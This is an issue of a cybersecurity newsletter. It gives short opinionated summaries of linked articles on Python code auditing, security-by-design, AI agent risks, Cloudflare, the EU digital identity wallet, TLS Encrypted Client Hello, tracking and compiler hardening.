While security testing is crucial for protection, identifying security defects in Python-based software requires specialised knowledge. Most security testers lack the in-depth training on Python-specific nuances that is essential for performing effective security evaluations.
In today’s digital world, cybersecurity remains a critical concern. This applies equally to the consumption and creation of Python software: preventing vulnerabilities begins with a robust architecture. However, even well-written code—including that generated by AI—is not secure by default. Python Code Audit is a vital, open-source (FOSS) tool that should be an integral part of your workflow.
1 Towards Modeling Cybersecurity Behavior of Humans in Organisations
Humans are the defining factor in your security defence. You can spend vast sums on expensive security products, but ultimately, your users will find ways to bypass them. Under time pressure, most people become incredibly inventive at finding workarounds to move documents in or out of the system. Their goal isn’t to compromise security, but simply to do a good job and generate revenue for your company.
Do not blame your users; blame your architects. Ensure the human factor is thoroughly addressed through a robust security-by-design training programme. Training architects and developers to practise security-by-design consistently yields a higher return on investment than chasing the next “holy grail” cybersecurity product. This paper is designed for easy reading, supported by a clear, informative visual.
(Link)
2 OpenClaw is a Security Nightmare
Everything you can imagine about OpenClaw is wrong. But it gets even worse. OpenClaw is a self-hosted AI agent that runs on your own machine and can execute real actions on your behalf: shell commands, file operations, and network requests. It is powerful, and the security blast radius effectively encompasses your entire system. OpenClaw is a delivery channel for malware.
(Link)
3 You should never use Cloudflare
I am no fan of Cloudflare and especially distrust governmental agencies using this service. It should be forbidden for public service. It harms your security and kills the privacy of your users. It’s impossible to use Cloudflare proxy without giving up encryption of data. They are a man-in-the-middle that have access to unencrypted information of all the traffic they proxy.
(Link)
4 The Seven Sins of European Digital Identity (EUDI)
Besides privacy concerns, the security model of the EUDI wallet component relies on the Trusted Execution Environment (TEE) layer provided by mobile OS manufacturers. This approach abandons the use of advanced cryptography in favour of compatibility with an API controlled by an oligopoly of foreign companies. All major players in the identity industry have long been aware of exploited vulnerabilities in mobile TEEs and—for very good reasons—do not rely on them. Nevertheless, current implementation plans for the EUDI appear to be heading towards a security nightmare, as all solid advice is being neglected.
(Link)
5 TLS ECH (Encrypted Client Hello)
Good security requires continuous learning. So better make it fun. This blog is a nice way to get (again) familiar with the TLS ECH RFC9849 in an easy way.
(Link)
6 Google is tracking you (even when you use DuckDuckGo)
Escaping Google’s tracking online is hard.
(Link)
7 Low-Level Software Security for Compiler Developers
Great open access book! So freely available online without barriers, such as mandatory registration. With software security becoming even more important in recent years, it is no surprise to see an ever increasing variety of security hardening features and mitigations against vulnerabilities implemented in compilers. This book aims to help developers of code generation tools such as JITs, compilers, linkers and assemblers to overcome this.
(Link)
8 Data Exfiltration Detection in Python Code
In the modern digital economy, data is an organisation’s most valuable asset. When sensitive information falls into unauthorised hands, the consequences are often irreversible. Data egress occurs when information travels from your secure internal perimeter to an external destination. In a Python context, this includes the public internet, third-party cloud environments, partner networks, or SaaS integrations. You can now use Python Code Audit to check for Data Exfiltration constructs in Python code.
(Link)
The Open Security newsletter is an overview of cyber security news with a core focus on openness. Pointing out what went wrong after a cyber security breach is easy. Designing good and simple measurements is hard. So join the open Security Reference Architecture collaboration project to create better solutions together. Or become a partner to support this project. Use our RSS or ATOM feed to follow Open Security News.